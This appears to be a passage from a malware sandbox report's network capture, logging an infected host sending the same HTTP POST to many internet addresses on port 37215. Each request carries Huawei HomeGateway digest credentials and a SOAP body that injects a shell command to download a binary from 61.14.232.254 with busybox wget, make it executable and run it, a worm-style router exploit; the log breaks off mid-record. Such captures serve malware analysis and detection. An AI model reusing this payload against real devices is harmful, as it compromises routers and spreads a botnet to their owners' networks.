                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2199192.168.2.1348252197.106.216.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.733434916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2200192.168.2.1344422197.73.216.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.733560085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2201192.168.2.1348824157.251.213.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.733560085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2202192.168.2.1357438165.7.212.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.734482050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2203192.168.2.1336760203.171.167.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.734513044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2204192.168.2.1345814180.249.235.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.734597921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2205192.168.2.1337254157.223.86.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.735296965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2206192.168.2.1339400157.81.31.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.736537933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2207192.168.2.134515041.206.204.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.736572027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2208192.168.2.1335674197.91.37.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.737238884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 